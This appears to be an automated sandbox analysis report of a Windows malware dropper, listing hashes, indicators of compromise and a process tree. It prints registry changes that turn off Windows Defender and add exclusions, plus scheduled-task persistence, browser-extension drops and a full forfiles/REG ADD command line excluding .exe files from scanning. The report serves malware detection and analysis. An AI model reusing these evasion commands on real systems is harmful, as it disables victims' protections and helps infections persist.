Analysis
-
max time kernel
128s -
max time network
132s -
platform
windows7_x64 -
resource
win7-20220812-en -
resource tags
arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system -
submitted
04-01-2023 22:09
Static task
static1
Behavioral task
behavioral1
Sample
file.exe
Resource
win7-20220812-en
General
-
Target
file.exe
-
Size
7.3MB
-
MD5
3cd7c42d2c7a1925a87b56ba30cdde73
-
SHA1
4936577e46bcb848f7b34f1039d819b04ff40fbc
-
SHA256
a66391f2f3e69aaa7554de8d6b9019839e376fcc25a89926e6912a0d57e9f960
-
SHA512
60770143900ce634d4f6b8051240ae9bb1489aeedcff71635d4279c680245ff26afe6362fc26a7fb96a7d8ac264a9c258a6546accdf346c6e2ced74d58291246
-
SSDEEP
196608:91Ol/maBX2YjppjTHcObIqVi0FtoEBg17p7wJufo7:3OxpBrHcYIqnFtoE21heki
Malware Config
Signatures
-
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" reg.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\EaSLpcFpMcYPpQna = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\VuDzvJgGU = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\EaSLpcFpMcYPpQna = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\VPYaDjxZBwAU2 = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\ktMefzCUrrOVNfEHK = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\EaSLpcFpMcYPpQna = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\qmPxrUzoObJDycnPoNR = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\ktMefzCUrrOVNfEHK = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\qmPxrUzoObJDycnPoNR = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\sZZRdZcplUZcC = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\EaSLpcFpMcYPpQna = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\VPYaDjxZBwAU2 = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\ZGnoZfjlmqUn = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\ZGnoZfjlmqUn = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\TKAtlPiSKHaugkVB = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\VuDzvJgGU = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\TKAtlPiSKHaugkVB = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\sZZRdZcplUZcC = "0" reg.exe -
Blocklisted process makes network request 1 IoCs
flow pid Process 21 1132 rundll32.exe -
Executes dropped EXE 4 IoCs
pid Process 1956 Install.exe 1668 Install.exe 956 jXNmHsV.exe 1488 zJFuYFn.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Control Panel\International\Geo\Nation zJFuYFn.exe -
Loads dropped DLL 12 IoCs
pid Process 1864 file.exe 1956 Install.exe 1956 Install.exe 1956 Install.exe 1956 Install.exe 1668 Install.exe 1668 Install.exe 1668 Install.exe 1132 rundll32.exe 1132 rundll32.exe 1132 rundll32.exe 1132 rundll32.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\manifest.json zJFuYFn.exe -
Drops file in System32 directory 19 IoCs
description ioc Process File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol jXNmHsV.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA zJFuYFn.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol jXNmHsV.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat zJFuYFn.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\A16C6C16D94F76E0808C087DFC657D99_ACA51E1ABBF1573BBD9B48CF6AC4217D zJFuYFn.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_259154B02A93A7C95A00126214FBE388 zJFuYFn.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA zJFuYFn.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\A16C6C16D94F76E0808C087DFC657D99_ACA51E1ABBF1573BBD9B48CF6AC4217D zJFuYFn.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol zJFuYFn.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat rundll32.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_259154B02A93A7C95A00126214FBE388 zJFuYFn.exe File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini jXNmHsV.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA zJFuYFn.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA zJFuYFn.exe -
Drops file in Program Files directory 13 IoCs
description ioc Process File created C:\Program Files (x86)\VPYaDjxZBwAU2\WSLRzBM.xml zJFuYFn.exe File created C:\Program Files (x86)\sZZRdZcplUZcC\aegutEX.xml zJFuYFn.exe File created C:\Program Files (x86)\ZGnoZfjlmqUn\NgxifQw.dll zJFuYFn.exe File created C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi zJFuYFn.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi zJFuYFn.exe File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak zJFuYFn.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja zJFuYFn.exe File created C:\Program Files (x86)\VuDzvJgGU\AgzBXpt.xml zJFuYFn.exe File created C:\Program Files (x86)\VuDzvJgGU\MSaVuW.dll zJFuYFn.exe File created C:\Program Files (x86)\VPYaDjxZBwAU2\bMhSnaLVUuIWf.dll zJFuYFn.exe File created C:\Program Files (x86)\qmPxrUzoObJDycnPoNR\xUXFpgE.dll zJFuYFn.exe File created C:\Program Files (x86)\qmPxrUzoObJDycnPoNR\GxESQOo.xml zJFuYFn.exe File created C:\Program Files (x86)\sZZRdZcplUZcC\rrAhbhQ.dll zJFuYFn.exe -
Drops file in Windows directory 4 IoCs
description ioc Process File created C:\Windows\Tasks\bkuWmsEVxSoFBLrMoP.job schtasks.exe File created C:\Windows\Tasks\MMXfBASmfLrLvsZVI.job schtasks.exe File created C:\Windows\Tasks\XKFBGwgxrEulmgf.job schtasks.exe File created C:\Windows\Tasks\gPnQnOXuswVFDBxMw.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 13 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1748 schtasks.exe 368 schtasks.exe 1760 schtasks.exe 1848 schtasks.exe 1740 schtasks.exe 1928 schtasks.exe 1632 schtasks.exe 1496 schtasks.exe 1576 schtasks.exe 1412 schtasks.exe 1984 schtasks.exe 1624 schtasks.exe 2040 schtasks.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates zJFuYFn.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates zJFuYFn.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates zJFuYFn.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates zJFuYFn.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates zJFuYFn.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host wscript.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix rundll32.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\de-92-e7-a5-1e-27\WpadDecisionReason = "1" rundll32.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\de-92-e7-a5-1e-27\WpadDecision = "0" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software wscript.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft wscript.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections zJFuYFn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing zJFuYFn.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs zJFuYFn.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs zJFuYFn.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" zJFuYFn.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{D9156085-B8D4-48F7-8977-024A5CABC2FE} zJFuYFn.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs zJFuYFn.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs zJFuYFn.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates zJFuYFn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust zJFuYFn.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs zJFuYFn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople zJFuYFn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing wscript.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" zJFuYFn.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs zJFuYFn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed zJFuYFn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root zJFuYFn.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\de-92-e7-a5-1e-27\WpadDecision = "0" zJFuYFn.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CTLs zJFuYFn.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates zJFuYFn.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs zJFuYFn.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host\Settings wscript.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" wscript.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs zJFuYFn.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs zJFuYFn.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs zJFuYFn.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" rundll32.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\de-92-e7-a5-1e-27\WpadDecisionTime = b0e605d69120d901 rundll32.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{D9156085-B8D4-48F7-8977-024A5CABC2FE}\WpadDecisionTime = b0e605d69120d901 zJFuYFn.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{D9156085-B8D4-48F7-8977-024A5CABC2FE}\WpadDecision = "0" zJFuYFn.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{D9156085-B8D4-48F7-8977-024A5CABC2FE}\de-92-e7-a5-1e-27 zJFuYFn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed zJFuYFn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople zJFuYFn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My zJFuYFn.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs zJFuYFn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings rundll32.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings zJFuYFn.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 zJFuYFn.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" zJFuYFn.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\de-92-e7-a5-1e-27\WpadDecisionReason = "1" zJFuYFn.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\de-92-e7-a5-1e-27\WpadDecisionTime = b0e605d69120d901 zJFuYFn.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates zJFuYFn.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs zJFuYFn.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" rundll32.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000003000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a7f0097000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 rundll32.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs zJFuYFn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust zJFuYFn.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{D9156085-B8D4-48F7-8977-024A5CABC2FE}\de-92-e7-a5-1e-27 rundll32.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" wscript.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad zJFuYFn.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000003000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a7f0097000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 zJFuYFn.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{D9156085-B8D4-48F7-8977-024A5CABC2FE}\WpadNetworkName = "Network 3" zJFuYFn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot zJFuYFn.exe -
Suspicious behavior: EnumeratesProcesses 29 IoCs
pid Process 1752 powershell.EXE 1752 powershell.EXE 1752 powershell.EXE 1664 powershell.EXE 1664 powershell.EXE 1664 powershell.EXE 1680 powershell.EXE 1680 powershell.EXE 1680 powershell.EXE 2020 powershell.EXE 2020 powershell.EXE 2020 powershell.EXE 1488 zJFuYFn.exe 1488 zJFuYFn.exe 1488 zJFuYFn.exe 1488 zJFuYFn.exe 1488 zJFuYFn.exe 1488 zJFuYFn.exe 1488 zJFuYFn.exe 1488 zJFuYFn.exe 1488 zJFuYFn.exe 1488 zJFuYFn.exe 1488 zJFuYFn.exe 1488 zJFuYFn.exe 1488 zJFuYFn.exe 1488 zJFuYFn.exe 1488 zJFuYFn.exe 1488 zJFuYFn.exe 1488 zJFuYFn.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 1752 powershell.EXE Token: SeDebugPrivilege 1664 powershell.EXE Token: SeDebugPrivilege 1680 powershell.EXE Token: SeDebugPrivilege 2020 powershell.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1864 wrote to memory of 1956 1864 file.exe 26 PID 1864 wrote to memory of 1956 1864 file.exe 26 PID 1864 wrote to memory of 1956 1864 file.exe 26 PID 1864 wrote to memory of 1956 1864 file.exe 26 PID 1864 wrote to memory of 1956 1864 file.exe 26 PID 1864 wrote to memory of 1956 1864 file.exe 26 PID 1864 wrote to memory of 1956 1864 file.exe 26 PID 1956 wrote to memory of 1668 1956 Install.exe 27 PID 1956 wrote to memory of 1668 1956 Install.exe 27 PID 1956 wrote to memory of 1668 1956 Install.exe 27 PID 1956 wrote to memory of 1668 1956 Install.exe 27 PID 1956 wrote to memory of 1668 1956 Install.exe 27 PID 1956 wrote to memory of 1668 1956 Install.exe 27 PID 1956 wrote to memory of 1668 1956 Install.exe 27 PID 1668 wrote to memory of 1756 1668 Install.exe 29 PID 1668 wrote to memory of 1756 1668 Install.exe 29 PID 1668 wrote to memory of 1756 1668 Install.exe 29 PID 1668 wrote to memory of 1756 1668 Install.exe 29 PID 1668 wrote to memory of 1756 1668 Install.exe 29 PID 1668 wrote to memory of 1756 1668 Install.exe 29 PID 1668 wrote to memory of 1756 1668 Install.exe 29 PID 1668 wrote to memory of 584 1668 Install.exe 31 PID 1668 wrote to memory of 584 1668 Install.exe 31 PID 1668 wrote to memory of 584 1668 Install.exe 31 PID 1668 wrote to memory of 584 1668 Install.exe 31 PID 1668 wrote to memory of 584 1668 Install.exe 31 PID 1668 wrote to memory of 584 1668 Install.exe 31 PID 1668 wrote to memory of 584 1668 Install.exe 31 PID 1756 wrote to memory of 972 1756 forfiles.exe 33 PID 1756 wrote to memory of 972 1756 forfiles.exe 33 PID 1756 wrote to memory of 972 1756 forfiles.exe 33 PID 1756 wrote to memory of 972 1756 forfiles.exe 33 PID 1756 wrote to memory of 972 1756 forfiles.exe 33 PID 1756 wrote to memory of 972 1756 forfiles.exe 33 PID 1756 wrote to memory of 972 1756 forfiles.exe 33 PID 584 wrote to memory of 1712 584 forfiles.exe 34 PID 584 wrote to memory of 1712 584 forfiles.exe 34 PID 584 wrote to memory of 1712 584 forfiles.exe 34 PID 584 wrote to memory of 1712 584 forfiles.exe 34 PID 584 wrote to memory of 1712 584 forfiles.exe 34 PID 584 wrote to memory of 1712 584 forfiles.exe 34 PID 584 wrote to memory of 1712 584 forfiles.exe 34 PID 972 wrote to memory of 1672 972 cmd.exe 35 PID 972 wrote to memory of 1672 972 cmd.exe 35 PID 972 wrote to memory of 1672 972 cmd.exe 35 PID 972 wrote to memory of 1672 972 cmd.exe 35 PID 972 wrote to memory of 1672 972 cmd.exe 35 PID 972 wrote to memory of 1672 972 cmd.exe 35 PID 972 wrote to memory of 1672 972 cmd.exe 35 PID 1712 wrote to memory of 1236 1712 cmd.exe 36 PID 1712 wrote to memory of 1236 1712 cmd.exe 36 PID 1712 wrote to memory of 1236 1712 cmd.exe 36 PID 1712 wrote to memory of 1236 1712 cmd.exe 36 PID 1712 wrote to memory of 1236 1712 cmd.exe 36 PID 1712 wrote to memory of 1236 1712 cmd.exe 36 PID 1712 wrote to memory of 1236 1712 cmd.exe 36 PID 972 wrote to memory of 564 972 cmd.exe 38 PID 972 wrote to memory of 564 972 cmd.exe 38 PID 972 wrote to memory of 564 972 cmd.exe 38 PID 972 wrote to memory of 564 972 cmd.exe 38 PID 972 wrote to memory of 564 972 cmd.exe 38 PID 972 wrote to memory of 564 972 cmd.exe 38 PID 972 wrote to memory of 564 972 cmd.exe 38 PID 1712 wrote to memory of 836 1712 cmd.exe 37
Processes
-
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1864 -
C:\Users\Admin\AppData\Local\Temp\7zS695E.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1956 -
C:\Users\Admin\AppData\Local\Temp\7zS7273.tmp\Install.exe.\Install.exe /S /site_id "525403"3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:1668 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:1756 -
